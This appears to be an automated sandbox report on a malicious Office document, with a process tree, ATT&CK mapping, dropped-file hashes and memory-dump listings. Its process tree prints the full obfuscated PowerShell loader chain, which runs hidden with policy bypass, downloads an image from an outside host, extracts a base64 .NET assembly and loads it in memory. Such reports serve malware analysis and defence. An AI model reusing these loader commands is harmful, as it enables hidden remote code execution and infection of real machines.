çCtBKgçCtBKD0çCtBKIçCtBKçCtBKwçCtBKFUçCtBKRgBpçCtBKG0çCtBKYQBnçCtBKGUçCtBKVçCtBKBlçCtBKHgçCtBKdçCtBKçCtBKuçCtBKFMçCtBKdQBiçCtBKHMçCtBKdçCtBKByçCtBKGkçCtBKbgBnçCtBKCgçCtBKMçCtBKBVçCtBKEYçCtBKcwB0çCtBKCcçCtBKKwçCtBKnçCtBKGEçCtBKcgB0çCtBKEkçCtBKbgçCtBKnçCtBKCsçCtBKJwBkçCtBKCcçCtBKKwçCtBKnçCtBKGUçCtBKeçCtBKçCtBKsçCtBKCçCtBKçCtBKMçCtBKBVçCtBKEYçCtBKYgBhçCtBKHMçCtBKZQçCtBK2çCtBKDQçCtBKTçCtBKBlçCtBKG4çCtBKZwB0çCtBKGgçCtBKKQçCtBK7çCtBKDçCtBKçCtBKVQBGçCtBKGMçCtBKbwBtçCtBKG0çCtBKYQBuçCtBKGQçCtBKQgB5çCtBKHQçCtBKZQBzçCtBKCçCtBKçCtBKPQçCtBKgçCtBKFsçCtBKUwB5çCtBKHMçCtBKdçCtBKBlçCtBKG0çCtBKLgBDçCtBKG8çCtBKbgB2çCtBKGUçCtBKcgB0çCtBKF0çCtBKOgçCtBK6çCtBKEYçCtBKcgBvçCtBKG0çCtBKQgBhçCtBKHMçCtBKZQçCtBK2çCtBKDQçCtBKUwB0çCtBKHIçCtBKaQBuçCtBKGcçCtBKKçCtBKçCtBKwçCtBKFUçCtBKRgBiçCtBKGEçCtBKcwBlçCtBKDYçCtBKJwçCtBKrçCtBKCcçCtBKNçCtBKBDçCtBKG8çCtBKbQBtçCtBKGEçCtBKbgBkçCtBKCkçCtBKOwçCtBKwçCtBKFUçCtBKRgBsçCtBKG8çCtBKYQBkçCtBKGUçCtBKZçCtBKBBçCtBKHMçCtBKcwBlçCtBKG0çCtBKYgBsçCtBKHkçCtBKIçCtBKçCtBKnçCtBKCsçCtBKJwçCtBK9çCtBKCçCtBKçCtBKWwBTçCtBKHkçCtBKcwB0çCtBKGUçCtBKbQçCtBKuçCtBKFIçCtBKZQBmçCtBKGwçCtBKZQBjçCtBKHQçCtBKaQBvçCtBKG4çCtBKLgBBçCtBKHMçCtBKcwBlçCtBKG0çCtBKYgBsçCtBKHkçCtBKXQçCtBKnçCtBKCsçCtBKJwçCtBK6çCtBKDoçCtBKTçCtBKçCtBKnçCtBKCsçCtBKJwBvçCtBKGEçCtBKZçCtBKçCtBKoçCtBKDçCtBKçCtBKVQBGçCtBKGMçCtBKbwBtçCtBKG0çCtBKYQBuçCtBKGQçCtBKQgB5çCtBKHQçCtBKZQBzçCtBKCkçCtBKOwçCtBKwçCtBKFUçCtBKRgB0çCtBKHkçCtBKcçCtBKBlçCtBKCçCtBKçCtBKPQçCtBKgçCtBKDçCtBKçCtBKVQBGçCtBKGwçCtBKbwBhçCtBKGQçCtBKZQBkçCtBKEEçCtBKcwçCtBKnçCtBKCsçCtBKJwBzçCtBKGUçCtBKbQBiçCtBKGwçCtBKeQçCtBKuçCtBKEcçCtBKZQB0çCtBKFQçCtBKeQBwçCtBKGUçCtBKKçCtBKçCtBK1çCtBKG8çCtBKWçCtBKBGçCtBKGkçCtBKYgBlçCtBKHIçCtBKLgBIçCtBKG8çCtBKbQBlçCtBKDUçCtBKbwBYçCtBKCkçCtBKOwçCtBKwçCtBKFUçCtBKRgBtçCtBKGUçCtBKdçCtBKBoçCtBKG8çCtBKZçCtBKçCtBKgçCtBKD0çCtBKIçCtBKçCtBKwçCtBKFUçCtBKRgB0çCtBKHkçCtBKcçCtBKBlçCtBKC4çCtBKRwBlçCtBKHQçCtBKTQçCtBKnçCtBKCsçCtBKJwBlçCtBKHQçCtBKaçCtBKBvçCtBKGQçCtBKKçCtBKçCtBK1çCtBKG8çCtBKWçCtBKBWçCtBKEEçCtBKSQçCtBK1çCtBKG8çCtBKWçCtBKçCtBKpçCtBKC4çCtBKJwçCtBKrçCtBKCcçCtBKSQBuçCtBKHYçCtBKbwBrçCtBKGUçCtBKJwçCtBKrçCtBKCcçCtBKKçCtBKçCtBKwçCtBKFUçCtBKRgBuçCtBKHUçCtBKbçCtBKBsçCtBKCwçCtBKIçCtBKBbçCtBKG8çCtBKYgBqçCtBKGUçCtBKYwB0çCtBKFsçCtBKXQBdçCtBKCçCtBKçCtBKKçCtBKçCtBK1çCtBKG8çCtBKWçCtBKBkçCtBKEgçCtBKaçCtBKçCtBKwçCtBKEwçCtBKawB4çCtBKFQçCtBKVQB5çCtBKDgçCtBKdwBPçCtBKFQçCtBKVQB2çCtBKE8çCtBKRçCtBKBjçCtBKHUçCtBKTQB6çCtBKGMçCtBKJwçCtBKrçCtBKCcçCtBKeçCtBKBMçCtBKGoçCtBKYwB5çCtBKE0çCtBKaQçCtBK0çCtBKHkçCtBKTwBUçCtBKEUçCtBKdgBMçCtBKHoçCtBKcçCtBKB3çCtBKGQçCtBKSçCtBKBSçCtBKG8çCtBKNQBvçCtBKFgçCtBKIçCtBKçCtBKsçCtBKCçCtBKçCtBKNQBvçCtBKFgçCtBKNQBvçCtBKFgçCtBKIçCtBKçCtBKsçCtBKCçCtBKçCtBKNQBvçCtBKFgçCtBKMgçCtBK1çCtBKG8çCtBKWçCtBKçCtBKgçCtBKCwçCtBKIçCtBKçCtBK1çCtBKG8çCtBKWçCtBKByçCtBKGUçCtBKZwBhçCtBKHMçCtBKbQçCtBK1çCtBKG8çCtBKWçCtBKçCtBKgçCtBKCwçCtBKIçCtBKçCtBK1çCtBKG8çCtBKWçCtBKçCtBK2çCtBKDUçCtBKbwBYçCtBKCçCtBKçCtBKLçCtBKçCtBKgçCtBKDUçCtBKJwçCtBKrçCtBKCcçCtBKbwBYçCtBKEMçCtBKOgBwçCtBKFIçCtBKJwçCtBKrçCtBKCcçCtBKWçCtBKBQçCtBKHIçCtBKbwBnçCtBKHIçCtBKYQBtçCtBKCcçCtBKKwçCtBKnçCtBKEQçCtBKYQB0çCtBKCcçCtBKKwçCtBKnçCtBKGEçCtBKcçCtBKBSçCtBKFgçCtBKNQBvçCtBKFgçCtBKLçCtBKçCtBKgçCtBKDUçCtBKbwBYçCtBKGgçCtBKdçCtBKBtçCtBKGwçCtBKdgBnçCtBKDUçCtBKbwBYçCtBKCkçCtBKKQçCtBKnçCtBKCkçCtBKLgBSçCtBKGUçCtBKcçCtBKBMçCtBKGEçCtBKYwBFçCtBKCgçCtBKJwBwçCtBKFIçCtBKWçCtBKçCtBKnçCtBKCwçCtBKWwBTçCtBKHQçCtBKUgBpçCtBKE4çCtBKZwBdçCtBKFsçCtBKYwBIçCtBKEEçCtBKcgBdçCtBKDkçCtBKMgçCtBKpçCtBKC4çCtBKUgBlçCtBKHçCtBKçCtBKTçCtBKBhçCtBKGMçCtBKRQçCtBKoçCtBKCgçCtBKWwBjçCtBKEgçCtBKQQByçCtBKF0çCtBKNçCtBKçCtBK4çCtBKCsçCtBKWwBjçCtBKEgçCtBKQQByçCtBKF0çCtBKOçCtBKçCtBK1çCtBKCsçCtBKWwBjçCtBKEgçCtBKQQByçCtBKF0çCtBKNwçCtBKwçCtBKCkçCtBKLçCtBKBbçCtBKFMçCtBKdçCtBKBSçCtBKGkçCtBKTgBnçCtBKF0çCtBKWwBjçCtBKEgçCtBKQQByçCtBKF0çCtBKMwçCtBK2çCtBKCkçCtBKLgBSçCtBKGUçCtBKcçCtBKBMçCtBKGEçCtBKYwBFçCtBKCgçCtBKJwçCtBK1çCtBKG8çCtBKWçCtBKçCtBKnçCtBKCwçCtBKWwBTçCtBKHQçCtBKUgBpçCtBKE4çCtBKZwBdçCtBKFsçCtBKYwBIçCtBKEEçCtBKcgBdçCtBKDMçCtBKOQçCtBKpçCtBKCçCtBKçCtBKfçCtBKçCtBKgçCtBKCYçCtBKIçCtBKçCtBKoçCtBKCçCtBKçCtBKJçCtBKBwçCtBKHMçCtBKaçCtBKBvçCtBKG0çCtBKZQBbçCtBKDIçCtBKMQBdçCtBKCsçCtBKJçCtBKBQçCtBKFMçCtBKSçCtBKBvçCtBKG0çCtBKZQBbçCtBKDMçCtBKMçCtBKBdçCtBKCsçCtBKJwB4çCtBKCcçCtBKKQçCtBK=';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('çCtBK','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:632
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('0UFimageUrl = 5oXhttps://uploaddeimagens.com.br/images/004/654/536/origi'+'nal/new_image.jp'+'g?16989577505oX;0UFwebClient = New-Object Sys'+'tem.'+'Net.WebClient;0UFimageBytes = 0UFwebClient.DownloadData(0UFimageUrl);0UFimageText = [System.Text.Encoding]::UTF8.GetString(0UFimageBytes);0'+'UFstart'+'Flag = 5oX<<BASE6'+'4_START>>5oX;0'+'U'+'FendFlag = 5oX<<BASE64_END>>5oX;0UFstartIndex = 0UFimage'+'Text.IndexOf(0UFstart'+'Flag);0UFendIndex '+'= 0UFimageText.IndexOf(0UFendFlag);0UFstartIndex -ge 0 -and 0UFendIndex -gt 0UFs'+'tartI'+'ndex;0UFstartIn'+'dex += 0UFstartFlag.Length;0UF'+'base64Length = 0UFendIndex - 0UFstartIndex;0UFbase64Command = 0UFimageText.Substring(0UFst'+'artIn'+'d'+'ex, 0UFbase64Length);0UFcommandBytes = [System.Convert]::FromBase64String(0UFbase6'+'4Command);0UFloadedAssembly '+'= [System.Reflection.Assembly]'+'::L'+'oad(0UFcommandBytes);0UFtype = 0UFloadedAs'+'sembly.GetType(5oXFiber.Home5oX);0UFmethod = 0UFtype.GetM'+'ethod(5oXVAI5oX).'+'Invoke'+'(0UFnull, [object[]] (5oXdHh0LkxTUy8wOTUvODcuMzc'+'xLjcyMi4yOTEvLzpwdHRo5oX , 5oX5oX , 5oX25oX , 5oXregasm5oX , 5oX65oX , 5'+'oXC:pR'+'XProgram'+'Dat'+'apRX5oX, 5oXhtmlvg5oX))').RepLacE('pRX',[StRiNg][cHAr]92).RepLacE(([cHAr]48+[cHAr]85+[cHAr]70),[StRiNg][cHAr]36).RepLacE('5oX',[StRiNg][cHAr]39) | & ( $pshome[21]+$PSHome[30]+'x')"
      4⤵
      Blocklisted process makes network request
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2304

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Exploitation for Client Execution

T1203

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
8fb7ee9e2eb0c84c7222a6fde65d2651

SHA1
38ae82bdb9157781689d3159cb76dcac7b85c8bc

SHA256
b0a53860a6ac49b026f729a26e844f164c947b5e0677d4714e936e188b8a228b

SHA512
39f5d0425a801f4a8d1bc7088ba35b7460afdc7a5163e80e8d5a6665ceb54cb8123b6cb87a4d107bf4f87198892b32294e97c784e4f05d151b8449606140b7af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD

Filesize
128KB

MD5
7ef133b1716c7c16cbd91e3b1f168355

SHA1
be67b9eeb7dd232eabe58d1881400a27ed6ec6da

SHA256
d05ee21b187bf8d911ea7a03eea7a165f84b3d2991623f296a9d9101b754d110

SHA512
5d05c17824bbff24e3e3da02b5a907228bfe28a657b8024e1540ff4c1e11f24e4b6d1d0b940f15968a946a0e742edab2a9c492a25db0b6add0b6e2d2713c9993

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{0F94856F-C1B8-4D9E-BFBE-466703E63270}.FSD

Filesize
128KB

MD5
3c99280d36526ade1aadb4e91ad7c7b4

SHA1
1dca22fdc2dd46b0671eb6be33a451fd9348f10d

SHA256
92cc54b7477e241010463c9e34649752ce89a0fa7fb58efefffa2f378c30da0e

SHA512
5dee6ba5d5e6e51ade8b8982f4c1e984985e46ab0e11ccb4d47da2a16fca82e0a6a17861d1dfe6a6123eecc29cc1eae98c662eea86067f1057e1660be1e31ae2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

Filesize
128KB

MD5
ae068803b2a2ef9c263a05e9d0cea6e0

SHA1
f5dbca51b983ae17b68998058188c8cae3673a4a

SHA256
48823b7dba85dbef596654231073f0533e31bfa61b0b4bff131bbda8cd33a040

SHA512
00c8b1ff109f7350629e6ed6e5f5314e3bee1919729415377ae2ba2ee1f169a5eb2de7a8310288eaef36b09d9bd1cd5d9e23077e4c42612b8435de3479aa3987

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{E99E295E-D300-4A38-9F5C-E0799D19651E}.FSD

Filesize
128KB

MD5
90d498c69166b0ee2f33aa135d3e4264

SHA1
84b89338609ba870bf4a008933dcd9dbffdfd0fc

SHA256
cd8f11652f27d284dce5d70955fbd241c7e9864f4f9c8a5351810759efe9af01

SHA512
268a27ebb3247e4448518e62c8684f1d9aa4618097c320e86b552b65a5279546f10edc61b615402d413c3258275cf7a79c0ec7329bc0ada937b6a5c45ab3c73c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WQGVC737\BrowserHistoryofChromeCleanupallCache[1].doc

Filesize
54KB

MD5
38568025b92f7ae0c0ee7747c8495f97

SHA1
52917ea86d627d77388ea6e874d80faf37720d1d

SHA256
54a662cae6dc5445bfaf070e62fe1aa571d537e59e74aa189313c111c074a7a2

SHA512
277d309b2e4ae52eae45c7d56243a38677b80517fd88ad00037efdca166a7982bf661674f7397d0317cc9a3a44e90d068362e5d5ad4265bbe2e17b17ad8e5db8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8FA6CDF4.doc

Filesize
54KB

MD5
38568025b92f7ae0c0ee7747c8495f97

SHA1
52917ea86d627d77388ea6e874d80faf37720d1d

SHA256
54a662cae6dc5445bfaf070e62fe1aa571d537e59e74aa189313c111c074a7a2

SHA512
277d309b2e4ae52eae45c7d56243a38677b80517fd88ad00037efdca166a7982bf661674f7397d0317cc9a3a44e90d068362e5d5ad4265bbe2e17b17ad8e5db8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab6FA6.tmp

Filesize
61KB

MD5
f3441b8572aae8801c04f3060b550443

SHA1
4ef0a35436125d6821831ef36c28ffaf196cda15

SHA256
6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

SHA512
5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar7045.tmp

Filesize
163KB

MD5
9441737383d21192400eca82fda910ec

SHA1
725e0d606a4fc9ba44aa8ffde65bed15e65367e4

SHA256
bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

SHA512
7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

Download Submit
C:\Users\Admin\AppData\Local\Temp\{1C6DE90E-7ECF-49DD-BB61-0B32F96CAC1D}

Filesize
128KB

MD5
e52ee6b8d7b1e8626f0d43fe44c1a5e2

SHA1
cefedc2f8c7b59a30b00c7df688a9c3c8ae6efba

SHA256
a222b3323fd4f57944d5c8258cb3504deda0fa7da74630e53ee7865a42fbcd2a

SHA512
fcb10eb6cb404b59f2ce4c9e5fd79fde0d2e41d4ca8cb8e959ae277455e9618ce334963c121a6bf614c86356bd6f7a0b4b49f4e3243754b9cc9b1d993b0197b2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

Filesize
113B

MD5
ee3f6a4dfdf2d35ad6305649fc9e8237

SHA1
ef928cf41457740f9756e63abc2c1613837daf6d

SHA256
40b4986090ad31ca97dcde08b9d6699a4781d93afd95e34713f8096a322e317a

SHA512
ea66f896c44439de67c66c2981b282ce25fae29ea109b3f7cf01d85e3712070e8e778ef0b2308c1a77efc5c875fcb9bc74d26b9a159486725f7d9ef1e5e74d7f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
20KB

MD5
ed9d46fa3e74925c8de35550475ce1a8

SHA1
448ee5626217313417d8c53ea6b7baf367dd5d69

SHA256
5f88718e830a4a2cee34889dff699df527f871143e1dd73a96b3e99496c1678e

SHA512
610f5476800c1cd925d55486069a1875edade1ffe2e35eff57e7768f9d242aa60126c80b50dd3ba40b0fccfbe22be35f2e7860c351ddfa7afe0df66a9458ad9c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VFAPFNBIBSEZDGMENPPZ.temp

Filesize
7KB

MD5
afca2ac00bb1256710c17936c7eec947

SHA1
ed3e48701437b7071b05141804393b0d7ebeb1f2

SHA256
55007d6cf22b0aecda614d28114cff1aeeabad9556367d57440d596a7ac087ae

SHA512
2b78bdc5ef9c313b229bfed4e263c5918408ce1e7ed2cb6108bfcc92f4fb2858002fdf15d18d13a4a9f223bdab4efac9baa31850c3f31fc403f0b22f44291ae7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
afca2ac00bb1256710c17936c7eec947

SHA1
ed3e48701437b7071b05141804393b0d7ebeb1f2

SHA256
55007d6cf22b0aecda614d28114cff1aeeabad9556367d57440d596a7ac087ae

SHA512
2b78bdc5ef9c313b229bfed4e263c5918408ce1e7ed2cb6108bfcc92f4fb2858002fdf15d18d13a4a9f223bdab4efac9baa31850c3f31fc403f0b22f44291ae7

Download Submit
C:\Users\Admin\AppData\Roaming\browserhistoryclean.vbs

Filesize
142KB

MD5
616aa90adf1fd3958ade7baf790cec91

SHA1
5ab3a37e5785a8419095dbe368a659417cb961a0

SHA256
81fdf8af6cce4057bcfed7214ec8e77810b3ac94dd7a9f2ec87dd37c5ded1e8c

SHA512
fc400db1a264f4515566cb95d0bc57f4e199baf00659142eafc794635bc69844a3685c2c173d0dd7920f049935b652fd8e7ec6999951a29d8023eeb7da66980d

Download Submit
C:\Users\Admin\AppData\Roaming\browserhistoryclean.vbs

Filesize
142KB

MD5
616aa90adf1fd3958ade7baf790cec91

SHA1
5ab3a37e5785a8419095dbe368a659417cb961a0

SHA256
81fdf8af6cce4057bcfed7214ec8e77810b3ac94dd7a9f2ec87dd37c5ded1e8c

SHA512
fc400db1a264f4515566cb95d0bc57f4e199baf00659142eafc794635bc69844a3685c2c173d0dd7920f049935b652fd8e7ec6999951a29d8023eeb7da66980d

Download Submit
memory/632-174-0x000000006A1E0000-0x000000006A78B000-memory.dmp

Filesize
5.7MB

Download
memory/632-102-0x0000000002620000-0x0000000002660000-memory.dmp

Filesize
256KB

Download
memory/632-99-0x000000006A1E0000-0x000000006A78B000-memory.dmp

Filesize
5.7MB

Download
memory/632-98-0x000000006A1E0000-0x000000006A78B000-memory.dmp

Filesize
5.7MB

Download
memory/632-100-0x0000000002620000-0x0000000002660000-memory.dmp

Filesize
256KB

Download
memory/1908-1-0x000000007245D000-0x0000000072468000-memory.dmp

Filesize
44KB

Download
memory/1908-101-0x000000007245D000-0x0000000072468000-memory.dmp

Filesize
44KB

Download
memory/1908-10-0x00000000023F0000-0x00000000023F2000-memory.dmp

Filesize
8KB

Download
memory/1908-206-0x000000007245D000-0x0000000072468000-memory.dmp

Filesize
44KB

Download
memory/1908-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2304-108-0x000000006A1E0000-0x000000006A78B000-memory.dmp

Filesize
5.7MB

Download
memory/2304-110-0x000000006A1E0000-0x000000006A78B000-memory.dmp

Filesize
5.7MB

Download
memory/2304-173-0x000000006A1E0000-0x000000006A78B000-memory.dmp

Filesize
5.7MB

Download
memory/2304-111-0x00000000028F0000-0x0000000002930000-memory.dmp

Filesize
256KB

Download
memory/2304-109-0x00000000028F0000-0x0000000002930000-memory.dmp

Filesize
256KB

Download
memory/2820-5-0x000000002F821000-0x000000002F822000-memory.dmp

Filesize
4KB

Download
memory/2820-7-0x000000007245D000-0x0000000072468000-memory.dmp

Filesize
44KB

Download
memory/2820-175-0x000000007245D000-0x0000000072468000-memory.dmp

Filesize
44KB

Download
memory/2820-9-0x0000000003600000-0x0000000003602000-memory.dmp

Filesize
8KB

Download
memory/2820-197-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2820-199-0x000000007245D000-0x0000000072468000-memory.dmp

Filesize
44KB

Download